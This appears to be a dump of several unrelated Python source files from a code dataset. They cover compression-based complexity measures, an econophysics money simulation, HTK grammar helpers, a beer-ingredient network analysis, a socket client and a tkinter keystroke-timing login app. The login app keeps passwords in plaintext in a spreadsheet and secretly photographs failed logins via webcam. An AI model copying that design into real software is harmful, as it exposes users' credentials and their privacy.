converged\r\n \r\n if zlibCIDs == False or gzipCIDs == False or lz4CIDs == False or lzmaCIDs == False:\r\n return True\r\n return ((max(zlibCIDs) - min(zlibCIDs)) > CIDConstraint) or ((max(gzipCIDs) - min(gzipCIDs)) > CIDConstraint) or ((max(lz4CIDs) - min(lz4CIDs)) > CIDConstraint) or ((max(lzmaCIDs) - min(lzmaCIDs)) > CIDConstraint)\r\n \r\ndef CIDs (money, zliblevel = -1, gziplevel = 9, discrete = False):\r\n # the actual CID calculation happens here\r\n \r\n if discrete:\r\n buf = struct.pack(f'{len(money)}I', *money)\r\n else:\r\n money2 = [round(x) for x in money]\r\n buf = struct.pack(f'{len(money)}I', *money2) # needs to be int for a nice compression\r\n # if I really want to be exact I can do this instead of rounding, I don't think it's worthwhile though:\r\n # moneynumerator = [0]*len(money)\r\n # moneydivisor = [0]*len(money)\r\n # for i in len(money)\r\n # moneynumerator[i], moneydivisor[i] = money[i].as_integer_ratio()\r\n # div = max(moneydivisor)\r\n # moneydiscr = [(div * moneynumerator[i])//moneydivisor[i] for i in len(money)]\r\n zlibCIDv = len(zlib.compress(buf,zliblevel))/len(buf)\r\n gzipCIDv = len(gzip.compress(buf,gziplevel))/len(buf)\r\n lz4CIDv = len(lz4.frame.compress(buf))/len(buf)\r\n lzmaCIDv = len(lzma.compress(buf))/len(buf)\r\n return zlibCIDv, gzipCIDv, lz4CIDv, lzmaCIDv\r\n\r\n \r\n \r\ndef zlibCID (bbytes, level = -1):\r\n return len(zlib.compress(bbytes,level))/len(bbytes)\r\n \r\ndef gzipCID (bbytes,compresslevel = 9):\r\n return len(gzip.compress(bbytes,compresslevel))/len(bbytes)\r\n \r\ndef lz4CID (bbytes):\r\n return len(lz4.frame.compress(bbytes))/len(bbytes)\r\n \r\ndef lzmaCID (bbytes):\r\n return len(lzma.compress(bbytes))/len(bbytes)\r\n\r\n\r\ndef BoltzmannHist(x,binsize,moneyint,N):\r\n return N*(1 - np.exp(-binsize/moneyint))*np.exp(-(x - binsize/2)/moneyint)\r\n\r\ndef BoltzmannHistPlot(moneyint,maxmoney,N,binsize,figure=None):\r\n if figure != None: \r\n plt.figure(figure)\r\n x = np.arange(0.0,maxmoney+binsize,binsize/4)\r\n y = BoltzmannHist(x,binsize,moneyint,N)\r\n plt.plot(x,y)\r\n \r\n \r\n\r\ndef YakovenkoPlot(money,N,NSweepstotal,binsize,moneyint,DeltaMax,figure=None,boltzmanndistr=True):\r\n #A script that plots the basic Yakovenko distribution\r\n \r\n if figure != None: \r\n plt.figure(figure)\r\n plt.hist(money, bins=np.arange(0,max(money)+ binsize,binsize))\r\n plt.title(f\"Histogram of N = {N} agents after {NSweepstotal}$\\cdot N$ Yakovenko 
iterations\")\r\n plt.xlabel(f\"Money ($m_0 = ${moneyint}, $\\Delta_{{max}} = ${DeltaMax})\")\r\n plt.ylabel(\"Amount of agents\") \r\n if boltzmanndistr == True:\r\n BoltzmannHistPlot(moneyint,max(money),N,binsize)\r\n \r\n \r\n \r\ndef YakovenkoIter(money, DeltaMax, discrete = False):\r\n #A script that does a single Yakovenko itration on money\r\n \r\n N = len(money)\r\n i = random.randrange(N)\r\n j = random.randrange(N)\r\n while i == j:\r\n j = random.randrange(N)\r\n if discrete and DeltaMax == 1:\r\n Delta = 1\r\n elif discrete:\r\n Delta = random.randint(1,DeltaMax)\r\n else:\r\n Delta = random.uniform(0,DeltaMax)\r\n if money[i] >= Delta:\r\n money[i] = money[i] - Delta\r\n money[j] = money[j] + Delta\r\n \r\n\r\ndef YakovenkoIters(NIters, money, DeltaMax, discrete = False):\r\n #A script that does multiple yakovenko iterations on money \r\n \r\n for i in range(NIters):\r\n YakovenkoIter(money, DeltaMax, discrete)\r\n\r\n\r\ndef ShannonEntropy(money):\r\n #A simple shannon entropy calculation \r\n \r\n N = math.ceil(max(money))\r\n S = 0\r\n for i in range(N):\r\n l = 0\r\n for x in money:\r\n if i <= x and x < i + 1:\r\n l += 1\r\n if l != 0:\r\n p = l / len(money)\r\n S += -p * math.log2(p)\r\n return S\r\n\r\n# def ShannonEntropy (money, bins = 25):\r\n # hist, edges = np.histogram(money, bins)\r\n # hist = hist/hist.sum()\r\n # ent = 0\r\n # for bin in hist:\r\n # ent += -bin*math.log2(bin)\r\n\r\n\r\n \r\n\r\n\r\n\r\n# def sweepsim (N = 1000, Nsweeps = 10, moneyint = 100, DeltaMax = 1):\r\n # money = [moneyint]*N\r\n # sweeps (money, Nsweeps, DeltaMax)\r\n # plt.hist(money, bins=25)\r\n # plt.title(\"Histogram of N = \"+str(N)+\" agents after \"+str(Nsweeps)+\" sweeps\")\r\n # plt.xlabel(\"Money ($m_i = $\"+str(moneyint)+\", $\\Delta_{max} = $\"+str(DeltaMax)+\")\")\r\n # plt.ylabel(\"Amount of agents\")\r\n # plt.show()\r\n \r\n \r\n \r\n \r\n\r\n# def sweep (money, DeltaMax):\r\n # N = len(money)\r\n # givers = list(range(N))\r\n # random.shuffle(givers)\r\n ## there's a possibility of money being exchanged from and to the same agent\r\n ## the thesis is unclear on whether this is supposed to happen\r\n # for i in range(N):\r\n # Delta = random.uniform(0,DeltaMax)\r\n # if money[givers[i]] >= Delta:\r\n # money[givers[i]] = money[givers[i]] - Delta\r\n # money[i] = money[i] + Delta\r\n \r\n \r\n \r\n\r\n# def sweeps (money, Nsweeps, DeltaMax):\r\n # for n in range(Nsweeps):\r\n # sweep (money, DeltaMax)\r\n \r\n","sub_path":"CIDs.py","file_name":"CIDs.py","file_ext":"py","file_size_in_byte":15682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"414177506","text":"\r\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DESCRIPTION %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n# \r\n# This script is intended to act as a module with different functions:\r\n# - Create pre-grammar files (needed prior grammar stage).\r\n# - Carry out the grammar stage.\r\n\r\n\r\n# Note: information about this htk-procedure in the htk book.\r\n\r\n#------------------------------------------------------------------------------------------------------------------\r\n# Authors:\r\n# - Main programmer: Salvador Florido Llorens\r\n# - Main Supervisor: Ignacio Moreno Torres\r\n# - Second Supervisor: Enrique Nava Baro\r\n\r\n#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% EXAMPLE OF USE %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\n# sys.path.insert(0, 'htk/Modulos_python')\r\n# import HTK_gram.py\r\n#\r\n# 
fillGram (labList, dir)\r\n\r\n\r\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% IMPORT PACKAGES %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\n\r\nimport subprocess\r\n\r\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% MAIN FUNCTIONS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\n\r\ndef fillGram (labList, dir):\r\n\r\n strTemp=\"$name = \"\r\n for indlab in range(len(labList)):\r\n \tif indlab==0:\r\n \t\tstrTemp=strTemp+labList[indlab]\r\n \telse:\r\n \t\tstrTemp=strTemp+\"|\"+labList[indlab]\r\n\r\n strGram=strTemp+\";\\n(silence $name silence)\"\r\n\r\n with open(dir,'w+') as fileW:\r\n \tfileW.write(strGram)\r\n\r\n return;\r\n\r\ndef gram():\r\n cmd = 'HParse Gramatica/gram.htk Gramatica/wdnet.htk'\r\n failure = subprocess.call(cmd, shell=True)\r\n print ('Gramatica Hecha')\r\n\r\n return;","sub_path":"htk/Modulos_python/HTK_gram.py","file_name":"HTK_gram.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"429606206","text":"# Open file\nfname = input('Enter File Name: ')\ntry:\n if len(fname) < 1: fname = 'mbox-short.txt'\n handle = open(fname)\nexcept:\n print(\"Invalid Input\")\n quit()\n\n# Extracting email lists and counts\ndic = dict()\nlst = list()\nfor line in handle:\n line = line.strip()\n words = line.split()\n if len(words) < 3:\n continue\n if words[0] == 'From':\n lst.append(words[1])\nfor word in lst:\n dic[word] = dic.get(word, 0) + 1\n\n# For loop to find most common words\nlargest = -1\nemail = None\nfor k, v in dic.items():\n if v > largest:\n largest = v\n email = k\n\nprint(email, largest)\n","sub_path":"PythonC2/ex_09_05_retry.py","file_name":"ex_09_05_retry.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"93214168","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 27 12:56:40 2017\n\n@author: HEUM\n\"\"\"\n\nimport networkx as nx\nimport numpy as np\n\nbipartite_graph=nx.read_gexf('gexf/modern_bipartite.gexf')\n\nbeer=set(n for n,d in bipartite_graph.nodes(data=True) if d['bipartite']=='beer')\ningredients=set(n for n,d in bipartite_graph.nodes(data=True) if d['bipartite']=='ingredient')\ncuisines=['England','Asia','Europe']\n\ngraphs=dict.fromkeys(cuisines)\nfor c in cuisines:\n #graphs[c]=nx.read_gexf('gexf/modern_bipartite_%s.gexf' % c)\n graphs[c]=nx.read_gexf('gexf/modern_bipartite.gexf')\n\nprevalence_dict={}\n\nfor c in cuisines:\n prevalence_dict[c]=dict.fromkeys(ingredients)\n \n # N: # of total number of recipes\n N=len(set(n for n,d in graphs[c].nodes(data=True) if d['bipartite']=='beer'))\n \n for i in ingredients:\n # n_i: # of recipes with the ingredient i\n n_i=nx.degree(graphs[c], i)\n \n prevalence = float(n_i) / float(N)\n \n prevalence_dict[c][i]=prevalence\n\nauthenticity_dict=dict.fromkeys(cuisines)\n\nfor c in cuisines:\n authenticity_dict[c]=dict.fromkeys(ingredients)\n for i in ingredients:\n other_prevalences=[]\n for c_other in cuisines:\n if not c_other == c:\n other_prevalences.append(prevalence_dict[c_other][i])\n prevalence=prevalence_dict[c][i]\n \n authenticity = prevalence - np.mean(other_prevalences)\n authenticity_dict[c][i] = authenticity","sub_path":"bipartite-network/prevalence_authenticity_analysis.py","file_name":"prevalence_authenticity_analysis.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"547945171","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 12 12:26:52 2018\r\n\r\n@author: Saumya\r\n\"\"\"\r\nimport cv2\r\nimport openpyxl\r\nfrom tkinter import *\r\nfrom time import time\r\nfrom PIL import Image,ImageTk\r\n\r\nglobal j\r\nj=0\r\nglobal y\r\ny=1\r\nglobal z\r\nz=0\r\nglobal l\r\nl=0\r\nglobal p\r\np=0\r\nglobal m\r\nm=0\r\n\r\ndef wel():\r\n global roots\r\n global l\r\n global m\r\n global p\r\n global roott\r\n global k\r\n global r1\r\n global z\r\n \r\n if z==1:\r\n r.destroy()\r\n \r\n if l==1:\r\n roott.destroy()\r\n \r\n if p==1:\r\n r1.destroy()\r\n \r\n if m==1:\r\n roots.destroy()\r\n \r\n #print(\"hello\")\r\n roots = Tk()\r\n \r\n k=0\r\n z=0\r\n l=0\r\n p=0\r\n m=0\r\n w=800\r\n h=600\r\n width,height=roots.winfo_screenwidth(),roots.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n roots.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n roots.configure(bg=\"#90C3C8\")\r\n roots.title('WELCOME')\r\n \r\n intruction = Label(roots,font=(\"Poor Richard\",40), text=' WELCOME\\n',highlightthickness=5,highlightbackground=\"black\",bg=\"#90C3C8\")\r\n intruction.grid(row=0, column=0,padx=10,pady=2, sticky=N+S)\r\n\r\n loginB = Button(roots, text='Login', command=Login,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n loginB.place(relx=.41,rely=.3)\r\n \r\n signupB = Button(roots, text='Signup', command=Signup,fg=\"black\",bg=\"#EA7317\",height=3,width=20) \r\n signupB.place(relx=.41,rely=.5)\r\n \r\n analysisB = Button(roots, text='Analysis', command=analysis,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n analysisB.place(relx=.41,rely=.7)\r\n \r\n roots.mainloop()\r\n\r\ndef Login():\r\n global pwordE\r\n global nameE\r\n global roots\r\n global k\r\n global m\r\n \r\n if k==0:\r\n roots.destroy()\r\n \r\n roots = Tk()\r\n m=1\r\n w=800\r\n h=600\r\n width,height=roots.winfo_screenwidth(),roots.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n roots.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n roots.configure(bg=\"#A0CCDA\")\r\n roots.title('LOGIN')\r\n intruction = Label(roots,font=(\"Poor Richard\",40), text=' Login\\n',highlightthickness=5,highlightbackground=\"black\",bg=\"#A0CCDA\")\r\n intruction.grid(row=0, column=0,padx=10,pady=2, sticky=N+S)\r\n\r\n\r\n nameL = Label(roots,font=(\"\",20), text='Username :: ',highlightthickness=5,bg=\"#A0CCDA\")\r\n nameL.place(relx=.2,rely=.25)\r\n\r\n nameE = Entry(roots,bg=\"lightgrey\",highlightthickness=2,highlightbackground=\"grey\")\r\n nameE.place(relx=0.5,rely=0.28)\r\n\r\n loginB = Button(roots, text='confirm', command=gett,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n loginB.place(relx=.42,rely=.6)\r\n \r\n backB = Button(roots, text='Back', command=wel,fg=\"black\",bg=\"#EA7317\",height=2,width=10)\r\n backB.place(relx=.6,rely=.9)\r\n \r\n roots.mainloop()\r\n \r\ndef gett():\r\n global rot\r\n global roots\r\n global counter\r\n global chk\r\n global cmp\r\n global totaltime\r\n rot=Tk()\r\n w=800\r\n h=600\r\n width,height=rot.winfo_screenwidth(),rot.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n rot.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n rot.configure(bg=\"#A0CCDA\")\r\n\r\n mylist = []\r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n rows=ws.max_row\r\n for i in range(1,rows+1):\r\n mylist.extend([ws.cell(row=i,column=1).value])\r\n\r\n pwordL = Label(rot,font=(\"\",20), text='Password :: ',highlightthickness=5,bg=\"#A0CCDA\")\r\n pwordL.place(relx=.2,rely=.25)\r\n pwordE = 
Entry(rot,bg=\"lightgrey\",highlightthickness=2,highlightbackground=\"grey\",show='*')\r\n pwordE.place(relx=0.5,rely=0.28)\r\n tw=pwordE.get()\r\n name=nameE.get()\r\n\r\n if name in mylist:\r\n print(\"bye\")\r\n counter=mylist.index(name)\r\n counter+=1\r\n cmp=ws.cell(row=counter,column=2).value\r\n\r\n roots.destroy()\r\n\r\n loginB = Button(rot, text='Login', command=CheckLogin,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n loginB.place(relx=.42,rely=.6)\r\n def logg(keyevent):\r\n global totaltime\r\n cword = cmp\r\n cwordsize = len(cword)\r\n cwordlist = tuple(cword)\r\n cwordfl = str(cwordlist[0])\r\n cwordll = str(cwordlist[-1])\r\n\r\n tword = pwordE.get()\r\n twordsize = len(tword)\r\n if twordsize > 0:\r\n twordlist = tuple(tword)\r\n twordfl = str(twordlist[0])\r\n twordll = str(twordlist[-1])\r\n if cwordsize == 1 and twordsize == 1:\r\n print(\"more letters\")\r\n if twordsize == 1 and cwordsize > 1:\r\n global start\r\n start = time()\r\n if twordsize == cwordsize and twordsize != 1:\r\n if cwordll == twordll:\r\n stop = time()\r\n totaltime = stop - start\r\n \r\n new_col=[tword]\r\n file='data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n col=11\r\n for row, entry in enumerate(new_col, start=1):\r\n ws.cell(row=counter, column=col, value=entry)\r\n\r\n wb.save(file)\r\n wb.close()\r\n\r\n pwordE.bind('<Key>', logg)\r\n\r\ndef CheckLogin():\r\n ##############################\r\n global cmp\r\n global totaltime\r\n rot.destroy()\r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n tw=ws.cell(row=counter,column=11).value\r\n t1=ws.cell(row=counter,column=9).value\r\n t2=ws.cell(row=counter,column=10).value\r\n print(\"time\",totaltime)\r\n if tw == cmp and t1<=totaltime and totaltime<=t2:\r\n global z\r\n z=1\r\n global m\r\n m=0\r\n \r\n global r\r\n global user\r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n user=ws.cell(row=counter,column=1).value\r\n \r\n r = Tk()\r\n w=700\r\n h=550\r\n width,height=r.winfo_screenwidth(),r.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n r.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n r.configure(bg=\"#A0CCDA\")\r\n r.title(':D')\r\n \r\n rlbl = Label(r,font=(\"Poor Richard\",30),text='\\n Hello {}'.format(user),bg=\"#A0CCDA\")\r\n rlbl.pack()\r\n \r\n analysisB = Button(r, text='Log Out', command=wel,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n analysisB.place(relx=.6,rely=.85)\r\n \r\n loginB = Button(r, text='CheckIntruders',command=CheckIntruder, fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n loginB.place(relx=.4,rely=.4)\r\n \r\n r.mainloop()\r\n else:\r\n global p\r\n \r\n \r\n p=1\r\n \r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n use=ws.cell(row=counter,column=1).value\r\n \r\n cam = cv2.VideoCapture(0) \r\n ret, frame = cam.read()\r\n \r\n img_name = \"pic_{}.png\".format(use)\r\n cv2.imwrite(img_name, frame)\r\n cam.release()\r\n\r\n global r1\r\n r1 = Tk()\r\n w=600\r\n h=450\r\n width,height=r1.winfo_screenwidth(),r1.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n r1.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n r1.configure(bg=\"#A0CCDA\")\r\n r1.title(':D')\r\n \r\n rlbl = Label(r1,font=(\"Poor Richard\",40),text='\\nInvalid \\n Login',bg=\"#A0CCDA\")\r\n rlbl.pack()\r\n \r\n logoutB = Button(r1, text='Exit', command=close,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n logoutB.place(relx=.6,rely=.85)\r\n 
\r\n r1.mainloop()\r\n\r\ndef close():\r\n global r1\r\n r1.destroy()\r\ndef display():\r\n global root \r\n root.destroy()\r\n \r\n global r\r\n global m\r\n m=0\r\n global z\r\n z=1\r\n global user\r\n \r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n user=ws.cell(row=counter,column=1).value\r\n \r\n r = Tk()\r\n w=700\r\n h=550\r\n width,height=r.winfo_screenwidth(),r.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n r.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n r.configure(bg=\"#A0CCDA\")\r\n r.title(':D')\r\n \r\n rlbl = Label(r,font=(\"Poor Richard\",30),text='\\n[+] Logged In',bg=\"#A0CCDA\")\r\n rlbl.pack()\r\n \r\n analysisB = Button(r, text='Log Out', command=wel,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n analysisB.place(relx=.6,rely=.85)\r\n \r\n loginB = Button(r, text='CheckIntruders',command=CheckIntruder, fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n loginB.place(relx=.4,rely=.4)\r\n \r\n r.mainloop()\r\ndef CheckIntruder():\r\n global r\r\n r.destroy()\r\n \r\n global root\r\n root=Tk()\r\n frame1 = Frame(root)\r\n frame1.pack(side=TOP, fill=X)\r\n \r\n photo1 = PhotoImage(file=\"pic_{}.png\".format(user))\r\n \r\n button1 = Button(frame1, compound=TOP, image=photo1,font=(\"\",17),text=\"Back\",fg=\"white\", bg='Black', command=display)\r\n button1.pack()\r\n \r\n button1.image = photo1\r\n \r\n root.mainloop()\r\n\r\ndef Signup():\r\n global nameEL\r\n global pwordEL\r\n global emailEL\r\n global mobEL\r\n global ageEL\r\n global rootA\r\n global roots\r\n global rows\r\n\r\n roots.destroy()\r\n fields = 'Username', 'Password', 'Email', 'Mob','Age'\r\n def fetch(entries):\r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n rows=ws.max_row\r\n rows+=1\r\n\r\n col=0\r\n\r\n for entry in entries:\r\n text = entry[1].get()\r\n\r\n new_col = [text]\r\n\r\n col+=1\r\n\r\n for row, entry in enumerate(new_col, start=1):\r\n ws.cell(row=rows, column=col, value=entry)\r\n\r\n wb.save(file)\r\n\r\n def makeform(root, fields):\r\n entries = []\r\n for field in fields:\r\n row = Frame(rootA)\r\n lab = Label(row, width=35,font=(\"\",13), text=field+\" ::\", anchor='w',bg=\"#90C3C8\")\r\n ent = Entry(row)\r\n row.pack(side=TOP, fill=Y, padx=5, pady=5)\r\n lab.pack(side=LEFT)\r\n ent.pack(side=RIGHT, expand=YES, fill=Y)\r\n entries.append((field, ent))\r\n return entries\r\n\r\n if __name__ == '__main__':\r\n fields = 'Username', 'Password', 'Email', 'Mob','Age'\r\n rootA = Tk()\r\n w=800\r\n h=600\r\n width,height=rootA.winfo_screenwidth(),rootA.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n rootA.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n rootA.configure(bg=\"#90C3C8\")\r\n\r\n rootA.title('SIGN-UP')\r\n intruction = Label(rootA,font=(\"\",20), text='Please Enter Credentials\\n',bg=\"#90C3C8\")\r\n intruction.pack(side=LEFT, padx=5, pady=5)\r\n ents = makeform(rootA, fields)\r\n rootA.bind('<Return>', (lambda event, e=ents: fetch(e)))\r\n\r\n b2 = Button(rootA, text='Next',command=combine_funcs((lambda e=ents: fetch(e)), sign),fg=\"black\",bg=\"#EA7317\",height=3,width=10)\r\n b2.place(relx=0.42,rely=0.8)\r\n\r\n rootA.mainloop()\r\n\r\ndef combine_funcs(*funcs):\r\n def combined_func(*args, **kwargs):\r\n for f in funcs:\r\n f(*args, **kwargs)\r\n return combined_func\r\n\r\ndef sign():\r\n rootA.destroy()\r\n pas()\r\n\r\ndef DelUser():\r\n rootA.destroy()\r\n Login()\r\ndef paes():\r\n global roots\r\n roots.destroy()\r\n pas()\r\ndef exi():\r\n global 
roots\r\n roots.destroy()\r\n Login()\r\n\r\ndef pas():\r\n global j\r\n j+=1\r\n global roots\r\n\r\n roots = Tk()\r\n w=700\r\n h=500\r\n width,height=roots.winfo_screenwidth(),roots.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n roots.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n roots.configure(bg=\"#A0CCDA\")\r\n roots.title('LOGIN')\r\n \r\n intruction = Label(roots,font=(\"Poor Richard\",30), text=' CONFIRM PASSWORD \\n',highlightthickness=5,highlightbackground=\"black\",bg=\"#A0CCDA\")\r\n intruction.grid(row=0, column=0,padx=10,pady=2, sticky=N+S)\r\n \r\n w1 = Label(roots,font=(\"\",20), text='Password :: ',highlightthickness=5,bg=\"#A0CCDA\") \r\n w1.grid(row=3, column=0,padx=10,pady=2, sticky=N+S) \r\n \r\n we = Entry(roots,bg=\"lightgrey\",highlightthickness=2,highlightbackground=\"grey\")\r\n we.grid(row=3, column=1,padx=10,pady=2, sticky=N+S)\r\n \r\n wb = openpyxl.load_workbook('data.xlsx')\r\n ws = wb['Sheet1']\r\n for row in ws.iter_rows('B{}:B{}'.format(ws.min_row,ws.max_row)):\r\n for cell in row:\r\n continue\r\n ce=cell.value\r\n sheet = wb.active\r\n\r\n def pressed(keyevent):\r\n cword = ce\r\n cwordsize = len(cword)\r\n cwordlist = tuple(cword)\r\n cwordfl = str(cwordlist[0])\r\n cwordll = str(cwordlist[-1])\r\n\r\n tword = we.get()\r\n twordsize = len(tword)\r\n if twordsize > 0:\r\n twordlist = tuple(tword)\r\n twordfl = str(twordlist[0])\r\n twordll = str(twordlist[-1])\r\n if cwordsize == 1 and twordsize == 1:\r\n print(\"more letters\")\r\n if twordsize == 1 and cwordsize > 1:\r\n global start\r\n start = time()\r\n if twordsize == cwordsize and twordsize != 1:\r\n if cwordll == twordll:\r\n stop = time()\r\n totaltime = stop - start\r\n print(\"time=\",totaltime)\r\n file = 'data.xlsx'\r\n new_col = [totaltime]\r\n\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n rows = ws.max_row\r\n if j==1:\r\n col = 6\r\n if j==2:\r\n col = 7\r\n if j==3:\r\n col = 8\r\n\r\n\r\n for row, entry in enumerate(new_col, start=1):\r\n ws.cell(row=rows, column=col, value=entry)\r\n\r\n wb.save(file)\r\n wb.close()\r\n\r\n we.bind('<Key>', pressed)\r\n \r\n if j<3:\r\n okButton = Button(roots, text='Confirm', command=paes,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n okButton.place(relx=.42,rely=.6)\r\n\r\n else:\r\n ekButton = Button(roots, text='End', command=cal,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n ekButton.place(relx=.42,rely=.6)\r\n\r\ndef cal():\r\n global k\r\n j=0\r\n if j==0:\r\n global roots\r\n \r\n wb = openpyxl.load_workbook('data.xlsx')\r\n ws = wb['Sheet1']\r\n rows=ws.max_row\r\n sum=0\r\n sheet = wb.active\r\n for col in ws.iter_cols(min_row=rows,max_row=rows,min_col=6,max_col=8):\r\n for cell in col:\r\n sum=sum+cell.value\r\n \r\n avg=sum/3\r\n minavg=avg-0.3\r\n max_avg=avg+0.3\r\n print(\"min=\",minavg)\r\n print(\"max=\",max_avg)\r\n new_col = [minavg]\r\n file='data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n col=9\r\n for row, entry in enumerate(new_col, start=1):\r\n ws.cell(row=rows, column=col, value=entry)\r\n new_col = [max_avg]\r\n col=10\r\n for row, entry in enumerate(new_col, start=1):\r\n ws.cell(row=rows, column=col, value=entry)\r\n \r\n wb.save(file)\r\n wb.close()\r\n \r\n j=1\r\n if j==1:\r\n k=1\r\n roots.destroy()\r\n Login()\r\n\r\n\r\ndef analysis():\r\n global roots \r\n roots.destroy()\r\n global roott\r\n global l\r\n roott = Tk()\r\n l=1\r\n \r\n frame1 = Frame(roott)\r\n frame1.pack(side=TOP, fill=X)\r\n \r\n photo1 = 
PhotoImage(file=\"analyy.png\")\r\n \r\n button1 = Button(frame1, compound=BOTTOM, image=photo1,font=(\"\",17),text=\"Back\", bg='green', command=wel)\r\n button1.pack()\r\n\r\n button1.image = photo1\r\n \r\n roott.mainloop()\r\n \r\n\r\nwel()\r\n","sub_path":"Password Pattern Recognition.py","file_name":"Password Pattern Recognition.py","file_ext":"py","file_size_in_byte":15969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"440854441","text":"from socket import *\nimport json\n\ndef cria_cliente(ip, porta):\n\t\"\"\"\n\tWe create the socket and connect it to the server \n\t\"\"\"\t\n\tip = str(ip)\n\tglobal sockobj\n\tsockobj = socket(AF_INET, SOCK_STREAM)\n\tsockobj.connect((ip, porta))\n\t\n\ncria_cliente('127.0.0.1', 50007)\n\nwhile True:\n\n\t#requisita = ''.encode()\t\n\t#sockobj.send(requisita)\n\t\n\t#After sending a message we wait for a reply from the server \n\tdata = sockobj.recv(1024)\n\tjson_da_lista = data.decode(\"utf-8\")\n\tlista_de_linhas = json.loads(json_da_lista)\n\tlinhas = '\\n'.join(lista_de_linhas)\n\tarquivo = open('file2.txt', 'w')\n\tarquivo.writelines(linhas)\n\tarquivo.close()","sub_path":"ladisan/Cliente/base_cliente_teste.py","file_name":"base_cliente_teste.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"316385656","text":"# a reasonable SNR level should be between 0 and 15 dB\nimport random\nimport numpy as np\n\n\npname_list = [\n \"noises_p\",\n \"reverb_p\",\n \"music_p\",\n \"overlap_p\",\n \"noises_snrs\",\n \"music_snrs\",\n \"overlap_snrs\",\n # 'bandrop_p'\n]\n\n\ndef convert2old(aug_config):\n return {\n 'reverb_p': aug_config['reverb']['p'],\n 'music_p': aug_config['music']['p'],\n 'noises_p': aug_config['noises']['p'],\n 'overlap_p': aug_config['overlap']['p'],\n 'music_snrs': aug_config['music']['snr'],\n 'overlap_snrs': aug_config['overlap']['snr'],\n 'noises_snrs': aug_config['noises']['snr'],\n \"spec_aug_time_mask_size\": aug_config[\"spec_aug\"]['time_mask_size'],\n \"spec_aug_freq_mask_size\": aug_config[\"spec_aug\"]['freq_mask_size'],\n }\n\ndef convert2new(aug_config):\n return {\n 'reverb': {'p': aug_config['reverb_p'], 'snr': 0,},\n 'music': {'p': aug_config['music_p'], 'snr': aug_config['music_snrs']},\n 'overlap': {'p': aug_config['overlap_p'], 'snr': aug_config['overlap_snrs']},\n 'noises': {'p': 